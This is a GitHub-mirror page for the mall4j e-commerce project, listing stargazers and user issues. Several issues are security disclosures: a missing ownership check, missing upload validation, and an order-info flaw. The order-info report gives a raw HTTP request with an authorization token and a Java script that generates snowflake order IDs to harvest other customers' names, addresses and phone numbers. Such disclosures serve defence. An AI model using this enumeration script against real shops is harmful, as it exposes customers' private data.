gz-yami / mall4j Goto Github PK

View Code? Open in Web Editor NEW

4.5K 4.5K 1.2K 15.88 MB

⭐️⭐️⭐️ 电商商城小程序电商商城系统 PC商城 H5商城 APP商城 Java商城 O2O商城跨境商城

Home Page: https://www.mall4j.com

License: GNU Affero General Public License v3.0

Java 40.36% Dockerfile 0.06% JavaScript 23.54% HTML 0.07% Vue 29.05% CSS 0.14% SCSS 6.78%

java jdk17 springboot3 uniapp vue3

mall4j's People

Contributors

Stargazers

Watchers

Forkers

daidegang soukengo godvmiku caihailing zhaozhy zcguo plutonju wqxdoc skiof007 v-yis06 anfernees-iphone 23days danielstones muchengyang truelig anye88 liuyuezhong songfang xuanxuan1994 marsw1987 liupeng0606 1783681442 guomingzhang2008 hiekay jbzhang99 f54701771 dashcrazymouse amoslee2019 springwindyike fgcp020 zhongleidev all-amazing lightsmileqian fendaq marvin-king leekingweng bossding xiangxiao2019 hwlsniper kaifengxu evenbing hanhongyuan chase-lou xalison moriartylee berkeleydeveloper bluepeople1 peizihui niyangyang 552301 hisinr joey-jiang-z bleet timmyds rothszhao haokinglong wn160921 ray0920 lichaochao62 ybbhai juan-wan nutbeans long-liu guoyuanbin yuxiang-git thesky0108 skyesk wangzufu fanglinyang infdes czq96 limterran chinarefers jiejiedeng fancyboynet eshopstudio iquanhe brilliantlinvlog zhaoshucai simhaonline zhuohuwu0603 sdtcsyl brainoverflow1 melodyjerry dobean chuangjan uotogk 925028680 goufaning zhuft cubean liuweigitter myqlrs niumeng1 yuanhu9 vennnice tanmincn zero91 yanwj123 sunoon

mall4j's Issues

演示地址打不开，会直接重定向到官网，就是那个用户名密码是admin/123456的演示地址。

[security vulnerability] Arbitrary Product Detail Access Vulnerability

Recently, our team found an arbitrary product detail access vulnerability in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/gz-yami/mall4j/blob/master/yami-shop-api/src/main/java/com/yami/shop/api/controller/ProdController.java#L72

There is an absence of ownership validation for the prodId parameter when querying product details through the skuService.listByProdId(), which does not consistent with the implementation at
https://github.com/gz-yami/mall4j/blob/master/yami-shop-admin/src/main/java/com/yami/shop/admin/controller/ProductController.java#L87, potentially compromising privacy data.

In the latter implementation, ownership is checked using the @PreAuthorize annotation and by evaluating Object.equals(prod.getShopId(), SecurityUtils.getSysUser().getShopId()) prior to executing similar operations. We recommend that developers add the same access control policy for @GetMapping("/prodInfo") API if necessary.

开发者泄露了一些手机号码

There is a insecure permission vulnerability that can lead to information Disclosure

After the user logged in, send the following data:
GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2 Host: b2b2c-api.mall4j.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/plain, */* Accept-Language: zh Accept-Encoding: gzip, deflate Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q Origin: https://pc.mall4j.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close
The user can input others orderNumbers to gain other Privacy Information including address,name,phonenumber and so on.
I write a script can get orderNumbers,attacker can get order's information that was created in any day.

Script:
`
import cn.hutool.core.date.SystemClock;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.StrUtil;

import java.io.*;
import java.util.Date;

public class test implements Serializable {
public static void main(String[] args) throws IOException {
FileWriter f = new FileWriter("/mall4j-master/1.txt");
FileOutputStream out = null;
for (long i = 1666884749000l; i <= 1666884750000l; i++) {
for (long j = 31l; j <= 31l; j++) {
test test1 = new test(1,1);
// out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));

            String str = String.valueOf(test1.nextId(i));
            System.out.println(str);
            f.write(str + "\n");
        }
    }

  //  System.out.println(test1.nextId(1666885538000l));

    f.close();



}
private static final long serialVersionUID = 1L;



public static long DEFAULT_TWEPOCH = 1288834974657L;

public static long DEFAULT_TIME_OFFSET = 2000L;

private static final long WORKER_ID_BITS = 5L;

private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
private static final long DATA_CENTER_ID_BITS = 5L;

private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);

private static final long SEQUENCE_BITS = 12L;

private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;

private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;

private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;


private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS);// 4095

private  long twepoch;
private  long workerId;
private  long dataCenterId;
private  boolean useSystemClock;

private  long timeOffset;

private long sequence = 0L;
private long lastTimestamp = -1L;


public test() {
    this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
}


public test(long workerId) {
    this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
}


public test(long workerId, long dataCenterId) {
    this(workerId, dataCenterId, false);
}


public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
    this(null, workerId, dataCenterId, isUseSystemClock);
}


public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
    this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
}


public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
    if (null != epochDate) {
        this.twepoch = epochDate.getTime();
        System.out.println("null != epochDate");
    } else{
        // Thu, 04 Nov 2010 01:42:54 GMT
        this.twepoch = DEFAULT_TWEPOCH;
    }
    if (workerId > MAX_WORKER_ID || workerId < 0) {
        throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
    }
    if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
        throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
    }
    this.workerId = workerId;
    this.dataCenterId = dataCenterId;
    this.useSystemClock = isUseSystemClock;
    this.timeOffset = timeOffset;
}


public long getWorkerId(long id) {
    return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
}

public long getDataCenterId(long id) {
    return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
}

public long getGenerateDateTime(long id) {
    return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
}


public synchronized long nextId(long time0) {

    long timestamp = time0;
    if (timestamp < this.lastTimestamp) {
        if(this.lastTimestamp - timestamp < timeOffset){
            // 容忍指定的回拨，避免NTP校时造成的异常
            timestamp = lastTimestamp;
        } else{
            // 如果服务器时间有问题(时钟后退) 报错。
            throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
        }
    }

    if (timestamp == this.lastTimestamp) {
        final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
        if (sequence == 0) {
            timestamp = tilNextMillis(lastTimestamp,time0);
        }
        this.sequence = sequence;
    } else {
        sequence = 0L;
    }

    lastTimestamp = timestamp;

    long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
            | (dataCenterId << DATA_CENTER_ID_SHIFT)
            | (workerId << WORKER_ID_SHIFT)
            | sequence;


    return result;
}


public String nextIdStr() {
   // return Long.toString(nextId());
    return null;
}

// ------------------------------------------------------------------------------------------------------------------------------------ Private method start


private long tilNextMillis(long lastTimestamp,long time0) {
    long timestamp = time0;
   
    while (timestamp == lastTimestamp) {
        timestamp = time0;
    }
    if (timestamp < lastTimestamp) {
        // 如果发现新的时间戳比上次记录的时间戳数值小，说明操作系统时间发生了倒退，报错
        throw new IllegalStateException(
                StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
    }
    return timestamp;
}

private long genTime() {
    return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method end

}
`

YamiSysUserDetailsServiceImpl不是抽象的，未覆盖YamiUserDetailsService

似乎跟码云上的代码没同步，有几个空的方法没有实现。

Lack of Backend Validation for Uploaded Image Size and Type

Lack proper validation for uploaded image files in the backend.
While there is validation in the frontend component "index.vue," it is crucial to perform server-side validation as well. This vulnerability allows attackers to upload files of any type and size, potentially leading to XSS attacks or resource exhaustion, which can result in DDoS attacks.

Two interfaces are affected:

1. "/upload/element" com.yami.shop.admin.controller.FileController.uploadElementFile
1. "/upload/element" com.yami.shop.admin.controller.FileController.uploadTinymceEditorImages

It is recommended to implement server-side validation for uploaded image files in String com.yami.shop.service.impl.AttachFileServiceImpl.uploadFile(MultipartFile file) . This includes checking the file size and verifying that the file type is allowed (e.g., image/jpeg, image/png). By implementing these validations in the backend, you can prevent the upload of malicious files, mitigate the risk of XSS attacks, and prevent resource consumption that could lead to DDoS attacks.

商城

vue项目报错

我贴个重要日志， node-sass安装失败。百度说是要py3的支持？

gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.

gyp ERR! cwd C:\Users\yikong\Desktop\mall4v-master\node_modules\node-sass
gyp ERR! node -v v14.15.4
gyp ERR! node-gyp -v v3.8.0
gyp ERR! not ok

npm ERR! [email protected] postinstall: `node scripts/build.js`
npm ERR! Exit status 1

表设计的是不是有问题

商品类目品牌的表设计是不是有问题而且有些表没数据

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.